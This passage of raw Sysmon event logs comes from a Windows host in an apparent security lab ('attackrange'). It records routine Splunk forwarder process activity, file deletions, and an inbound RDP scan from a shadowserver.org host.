10341000x8000000000000000808493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.666{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.651{0C1E0330-F5E5-60EB-9879-00000000D001}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.525{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20F4A289F7A03AB2C175CFAB0E45A068,SHA256=699B955CDA56F81CE458B732270FC2495E9054A8706C8247B018B42E24BFF71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.525{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99FB400CD1BC03EDDD44992DF72704C8,SHA256=872BB68EE2B8A2CB010F76C2A352848F926DE0A218D847A2B4613992C8B5BF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.259{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6AE320F8807EFC415A896DAAA33AA7A,SHA256=46BB1DFAB2829EA280CE4FD7F2D33F5F295FE3CF1FA8A873E8C9188DC2018E98,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:23.754{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse65.49.20.68scan-19.shadowserver.org36662-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000808476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.009{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 